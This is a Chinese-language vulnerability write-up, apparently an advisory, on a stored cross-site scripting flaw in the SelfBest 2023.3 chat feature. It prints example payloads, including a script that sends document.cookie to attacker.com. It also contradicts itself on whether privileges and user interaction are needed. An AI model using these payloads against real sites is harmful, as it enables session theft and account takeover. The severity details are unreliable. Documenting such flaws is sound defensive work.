CVE-2025-63417CVE-2025-63417是存在于SelfBest平台2023.3版本聊天功能中的一个高危安全漏洞,属于存储型跨站脚本攻击(Stored Cross-Site Scripting,简称XSS)。该漏洞允许已认证的攻击者通过聊天消息输入字段注入任意Web脚本或HTML代码。被注入的恶意内容会被永久存储在服务器端,当其他用户查看包含恶意消息的聊天记录时,这些脚本代码会在受害者浏览器中执行,从而实现对受害者浏览器的完全控制。攻击者可以利用此漏洞窃取用户会话Cookie、实施会话劫持、进行账户接管、诱导受害者执行敏感操作或传播恶意软件。由于存储型XSS的攻击代码被持久化在服务器上,每次有用户访问相关聊天记录时都会触发攻击,因此其危害范围和影响程度远大于反射型XSS和DOM型XSS。该漏洞的CVSS评分为7.2(高危),攻击向量为网络层面,无需特殊权限和用户交互即可实现攻击,具有较高的利用性和危害性。
该存储型XSS漏洞存在于SelfBest平台的聊天消息处理模块中。攻击过程如下:首先,攻击者需要拥有一个有效的SelfBest平台账户并登录系统。然后,攻击者在聊天消息输入字段中构造包含恶意JavaScript代码的消息,例如:<img src=x onerror=alert(document.cookie)>或<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>。由于应用程序未对用户输入进行充分的输入验证和输出编码,恶意脚本被直接存储到数据库中。当其他用户打开聊天窗口或查看聊天历史记录时,服务器从数据库中检索并返回包含恶意代码的消息内容到用户浏览器。浏览器将这些内容作为HTML解析并执行其中的JavaScript代码,从而完成攻击。攻击者可以窃取受害者的认证令牌、会话Cookie、键盘输入记录,或者诱导受害者访问钓鱼页面。由于该漏洞影响的是聊天功能这一高频使用的模块,潜在受害者范围广泛,且攻击具有自动化和规模化的特点。